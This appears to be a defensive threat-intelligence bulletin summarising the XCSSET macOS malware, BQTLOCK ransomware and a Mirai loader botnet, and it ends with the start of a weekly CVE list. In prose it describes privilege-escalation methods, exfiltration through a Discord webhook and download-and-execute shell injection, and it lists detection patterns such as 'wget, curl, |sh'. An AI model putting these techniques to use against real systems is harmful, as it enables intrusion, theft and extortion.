Update: XCSSET Malware Evolves with New Stealth and Theft Capabilities
Microsoft researchers report a new variant of the XCSSET macOS malware that continues to focus on infecting Xcode projects, which are often shared among developers. XCSSET targets developers by infecting Xcode projects, allowing the malicious code to run when a project is built. The infection chain begins with a compromised Xcode project or a cloned repository; when the developer builds the project, XCSSET executes embedded scripts that fetch additional modules from attacker servers. Those modules perform a range of actions: they harvest browser-stored secrets, capture and replace clipboard data with attacker-controlled cryptocurrency addresses, and pull down run-only AppleScripts that execute covertly. The implant conceals its activity through encryption and obfuscation, utilizes ad-hoc signing and temporary files to evade casual detection, and now features a module that targets Firefox data in addition to other browsers. Persistence is achieved by creating LaunchDaemon entries and a disguised, fake app to run the payload across reboots. The malware deliberately disables macOS automatic security updates to lengthen its window of access. Key identifiers include unusual build-time processes or scripts running during Xcode builds, unexpected network calls from development machines to unknown domains, and new or modified files in /tmp, /Users/Shared, or developer-derived build folders. Look for LaunchDaemon plist entries with unfamiliar names, a ~/.root or similarly hidden payload file, and any creation of fake applications in /tmp that launch at user login. Researchers also found that it downloads additional AppleScript-based modules from attacker servers to expand functionality. Microsoft has observed these changes in limited attacks and has collaborated with Apple and GitHub to remove related repositories; however, the campaign highlights how developers remain an attractive target for malware operators. Keeping macOS patched, validating shared Xcode projects, and monitoring for clipboard tampering or suspicious persistence files are critical defensive steps.
BQTLOCK Ransomware Attacking Windows Users Via Telegram
Researchers have discovered a new RaaS strain called BQTLOCK, which is actively distributed through Telegram channels and dark web forums. Affiliates spread the malware via malicious ZIP archives containing an Update[.]exe executable that encrypts files under 50 MB, appends a “[.]bqtlock” extension, and deletes backups to block recovery. The ransomware uses AES-256 to encrypt file content, with RSA-4096 securing the keys, and drops a ransom note demanding 13 to 40 Monero (approximately $3,600 to $10,000) within 48 hours. Victims are instructed to contact attackers through Telegram or X, with ransom demands doubling if deadlines are not met and decryption keys destroyed after seven days. To evade detection, BQTLOCK employs anti-analysis measures, including string obfuscation, debugger checks, and virtual machine evasion stubs, while gathering system information and exfiltrating it via a Discord webhook. It further escalates privileges using CMSTP, fodhelper[.]exe, and eventvwr[.]exe, creates a local administrator account named “BQTLockAdmin,” and injects into explorer[.]exe for stealth. Beyond encryption, BQTLOCK terminates antivirus and backup processes, establishes persistence with a scheduled task named SystemHealthCheck, and alters wallpapers and file icons via registry modifications. The RaaS model offers Starter, Professional, and Enterprise tiers, with a builder interface that allows affiliates to customize ransom notes, extensions, and anti-analysis features without requiring technical knowledge. The latest version of the builder, released in August, added credential theft modules for popular browsers, improved obfuscation, and new UAC bypass methods. Despite claims by its operators, led by an individual known as ZeroDayX, that the malware is fully undetectable, samples showed limited submissions on VirusTotal and some corrupted builds. Operators continue to expand their presence by reopening blocked Telegram channels and launching BAQIYAT.[.]osint, a paid service for searching stolen data. Mitigation requires organizations and individuals to maintain offline or immutable backups, monitor for unauthorized administrator accounts and scheduled tasks, enforce least-privilege principles, and deploy advanced endpoint protections capable of detecting process hollowing and privilege escalation attempts.
Loader-as-a-Service Botnet Exploits Routers and IoT for Mirai Deployment
CloudSEK has uncovered a botnet operation offering “Loader-as-a-Service,” which has been active for six months and is rapidly growing. The operators compromise SOHO routers, embedded Linux devices, and enterprise applications through unsanitized POST parameters (NTP, syslog, hostname), default credentials, and known CVEs in WebLogic, WordPress, and vBulletin. Exposed C2 panel logs revealed the attack flow, which included brute force and credential spraying against web interfaces, injection of shell commands using wget or BusyBox to fetch droppers, and reconnaissance collection of firmware and MAC data before payload staging. From July to August 2025, the attack volume increased by 230%, with delivery of multi-architecture Morte binaries, cryptominers, and Mirai-based DDoS bots. Redundant delivery infrastructure across multiple IPs ensures persistence despite takedowns. Enterprises face exploitation of WebLogic and Struts2 components for deeper intrusion and potential ransomware staging. Edge routers are vulnerable to hijacking for DDoS attacks, DNS tampering, or NTP manipulation, which can degrade bandwidth and uptime. Small businesses and IoT devices are weaponized as stepping stones against larger targets, expanding the attacker’s reach. Indicators include POST requests with embedded shell commands (wget, curl, |sh), outbound connections over TFTP/FTP from IoT networks, unexplained JSON-RPC traffic tied to miners, and processes spawning from /tmp/morte.*. Defenders should enforce egress controls, patch exposed services, disable unnecessary remote management, and segment IoT from production networks. SOC teams should prioritize detection rules for download-and-execute chains, monitor shell command logs and process trees for anomalies, and isolate devices exhibiting mining or Mirai activity.
Top CVEs of the Week
Top CVEs of the Week – As part of our ongoing vulnerability monitoring, the following CVEs highlight recent security issues that could affect a range of systems, applications, and devices. These findings reflect the constantly evolving threat landscape and reinforce the importance of timely patching, secure configurations, and proactive security practices. Below is a summary of notable vulnerabilities, including their impact and any available remediation guidance.
